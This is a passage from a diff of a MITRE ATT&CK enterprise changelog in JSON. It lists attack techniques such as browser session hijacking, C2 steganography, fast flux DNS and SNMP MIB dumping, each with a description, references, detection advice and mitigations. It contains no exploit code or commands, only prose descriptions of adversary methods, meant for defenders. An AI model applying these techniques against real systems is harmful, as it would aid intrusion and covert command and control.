Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:38.641000+00:00\", \"old_value\": \"2025-04-15 19:58:30.225000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1025: Privileged Process Integrity" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0011: Module (Module Load)", + "DS0017: Command (Command Execution)", + "DS0024: Windows Registry (Windows Registry Key Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 15:15:33.428000+00:00", + "name": "Browser Session Hijacking", + "description": "Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)\n\nA specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as pivoting may require specific process permissions, such as SeDebugPrivilege and/or high-integrity/administrator rights.\n\nAnother example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1185", + "external_id": "T1185" + }, + { + "source_name": "Wikipedia Man in the Browser", + "description": "Wikipedia. (2017, October 28). Man-in-the-browser. Retrieved January 10, 2018.", + "url": "https://en.wikipedia.org/wiki/Man-in-the-browser" + }, + { + "source_name": "Cobalt Strike Browser Pivot", + "description": "Mudge, R. (n.d.). Browser Pivoting. Retrieved January 10, 2018.", + "url": "https://www.cobaltstrike.com/help-browser-pivoting" + }, + { + "source_name": "ICEBRG Chrome Extensions", + "description": "De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL BUSINESSES. Retrieved January 17, 2018.", + "url": "https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses" + }, + { + "source_name": "cobaltstrike manual", + "description": "Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.", + "url": "https://web.archive.org/web/20210825130434/https://cobaltstrike.com/downloads/csmanual38.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Justin Warner, ICEBRG" + ], + "x_mitre_data_sources": [ + "Process: Process Modification", + "Process: Process Access", + "Logon Session: Logon Session Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. New processes may not be created and no additional software dropped to disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for [Process Injection](https://attack.mitre.org/techniques/T1055) against browser applications.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:15:33.428000+00:00\", \"old_value\": \"2025-04-15 19:58:32.147000+00:00\"}}}", + "previous_version": "2.1", + "changelog_mitigations": { + "shared": [ + "M1017: User Training", + "M1018: User Account Management" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Access)", + "DS0009: Process (Process Modification)", + "DS0028: Logon Session (Logon Session Creation)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-03-14 23:39:50.117000+00:00", + "modified": "2025-04-25 14:48:12.613000+00:00", + "name": "Non-Standard Encoding", + "description": "Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1132/002", + "external_id": "T1132.002" + }, + { + "source_name": "Wikipedia Binary-to-text Encoding", + "description": "Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.", + "url": "https://en.wikipedia.org/wiki/Binary-to-text_encoding" + }, + { + "source_name": "Wikipedia Character Encoding", + "description": "Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.", + "url": "https://en.wikipedia.org/wiki/Character_encoding" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "ESXi" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:12.613000+00:00\", \"old_value\": \"2025-04-15 19:59:11.823000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1031: Network Intrusion Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Traffic Content)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-03-15 00:37:58.963000+00:00", + "modified": "2025-04-25 14:48:29.907000+00:00", + "name": "Steganography", + "description": "Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1001/002", + "external_id": "T1001.002" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "ESXi" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:29.907000+00:00\", \"old_value\": \"2025-04-15 19:59:20.025000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1031: Network Intrusion Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Traffic Content)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-20 00:08:21.745000+00:00", + "modified": "2025-04-25 14:46:40.804000+00:00", + "name": "Network Device Configuration Dump", + "description": "Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.\n\nAdversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1602/002", + "external_id": "T1602.002" + }, + { + "source_name": "US-CERT TA18-106A Network Infrastructure Devices 2018", + "description": "US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-106A" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + }, + { + "source_name": "US-CERT TA18-068A 2018", + "description": "US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration.(Citation: US-CERT TA18-068A 2018)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network Devices" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:40.804000+00:00\", \"old_value\": \"2025-04-15 19:58:31.045000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1030: Network Segmentation", + "M1031: Network Intrusion Prevention", + "M1037: Filter Network Traffic", + "M1041: Encrypt Sensitive Information", + "M1051: Update Software", + "M1054: Software Configuration" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Content)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--ee7ff928-801c-4f34-8a99-3df965e581a5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-19 23:51:05.953000+00:00", + "modified": "2025-04-25 14:48:29.549000+00:00", + "name": "SNMP (MIB Dump)", + "description": "Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).\n\nThe MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.\n\nAdversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1602/001", + "external_id": "T1602.001" + }, + { + "source_name": "SANS Information Security Reading Room Securing SNMP Securing SNMP", + "description": "Michael Stump. (2003). Information Security Reading Room Securing SNMP: A Look atNet-SNMP (SNMPv3). Retrieved October 19, 2020.", + "url": "https://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051" + }, + { + "source_name": "US-CERT-TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + }, + { + "source_name": "Cisco Advisory SNMP v3 Authentication Vulnerabilities", + "description": "Cisco. (2008, June 10). Identifying and Mitigating Exploitation of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Identify network traffic sent or received by untrusted hosts or networks that expose MIB content or use unauthorized protocols.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network Devices" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:29.549000+00:00\", \"old_value\": \"2025-04-15 19:59:19.943000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1030: Network Segmentation", + "M1031: Network Intrusion Prevention", + "M1037: Filter Network Traffic", + "M1041: Encrypt Sensitive Information", + "M1051: Update Software", + "M1054: Software Configuration" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Content)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-04-08 17:51:41.390000+00:00", + "modified": "2025-04-25 15:15:35.374000+00:00", + "name": "Defacement", + "description": "Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages. \n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1491", + "external_id": "T1491" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "File: File Creation", + "Application Log: Application Log Content", + "File: File Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor internal and external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.\n\n", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_impact_type": [ + "Integrity" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "IaaS", + "Linux", + "macOS", + "ESXi" + ], + "x_mitre_version": "1.4", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:15:35.374000+00:00\", \"old_value\": \"2025-04-15 19:58:33.958000+00:00\"}}}", + "previous_version": "1.4", + "changelog_mitigations": { + "shared": [ + "M1053: Data Backup" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0015: Application Log (Application Log Content)", + "DS0022: File (File Creation)", + "DS0022: File (File Modification)", + "DS0029: Network Traffic (Network Traffic Content)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-03-10 17:28:11.747000+00:00", + "modified": "2025-04-25 15:15:46.359000+00:00", + "name": "Dynamic Resolution", + "description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.\n\nAdversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1568", + "external_id": "T1568" + }, + { + "source_name": "Talos CCleanup 2017", + "description": "Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast Number of Machines at Risk. Retrieved March 9, 2018.", + "url": "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html" + }, + { + "source_name": "FireEye POSHSPY April 2017", + "description": "Dunwoody, M.. (2017, April 3). Dissecting One of APT29\u2019s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" + }, + { + "source_name": "ESET Sednit 2017 Activity", + "description": "ESET. (2017, December 21). Sednit update: How Fancy Bear Spent the Year. Retrieved February 18, 2019.", + "url": "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/" + }, + { + "source_name": "Data Driven Security DGA", + "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019.", + "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Chris Roffe" + ], + "x_mitre_data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detecting dynamically generated C2 can be challenging due to the number of different algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There are multiple approaches to detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more (Citation: Data Driven Security DGA). CDN domains may trigger these detections due to the format of their domain names. In addition to detecting algorithm generated domains based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "ESXi" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:15:46.359000+00:00\", \"old_value\": \"2025-04-15 19:58:44.211000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1021: Restrict Web-Based Content", + "M1031: Network Intrusion Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Content)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-03-11 14:56:34.154000+00:00", + "modified": "2025-04-25 14:47:18.343000+00:00", + "name": "DNS Calculation", + "description": "Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)\n\nOne implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1568/003", + "external_id": "T1568.003" + }, + { + "source_name": "Meyers Numbered Panda", + "description": "Meyers, A. (2013, March 29). Whois Numbered Panda. Retrieved January 14, 2016.", + "url": "http://www.crowdstrike.com/blog/whois-numbered-panda/" + }, + { + "source_name": "Moran 2014", + "description": "Moran, N., Oppenheim, M., Engle, S., & Wartell, R.. (2014, September 3). Darwin\u2019s Favorite APT Group [Blog]. Retrieved November 12, 2014.", + "url": "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" + }, + { + "source_name": "Rapid7G20Espionage", + "description": "Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage Operations. Retrieved March 6, 2017.", + "url": "https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. Detection may be possible by analyzing DNS records if the algorithm is known.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "ESXi" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:18.343000+00:00\", \"old_value\": \"2025-04-15 19:58:47.388000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Traffic Content)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-03-11 14:11:16.560000+00:00", + "modified": "2025-04-25 14:46:09.378000+00:00", + "name": "Fast Flux DNS", + "description": "Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)\n\nThe simplest, \"single-flux\" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)\n\nIn contrast, the \"double-flux\" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1568/001", + "external_id": "T1568.001" + }, + { + "source_name": "MehtaFastFluxPt1", + "description": "Mehta, L. (2014, December 17). Fast Flux Networks Working and Detection, Part 1. Retrieved March 6, 2017.", + "url": "https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-1/#gref" + }, + { + "source_name": "MehtaFastFluxPt2", + "description": "Mehta, L. (2014, December 23). Fast Flux Networks Working and Detection, Part 2. Retrieved March 6, 2017.", + "url": "https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-2/#gref" + }, + { + "source_name": "Fast Flux - Welivesecurity", + "description": "Albors, Josep. (2017, January 12). Fast Flux networks: What are they and how do they work?. Retrieved March 11, 2020.", + "url": "https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Connection Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as domain registrars and service providers are likely in the best position for detection.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "ESXi" + ], + "x_mitre_version": "1.1", + 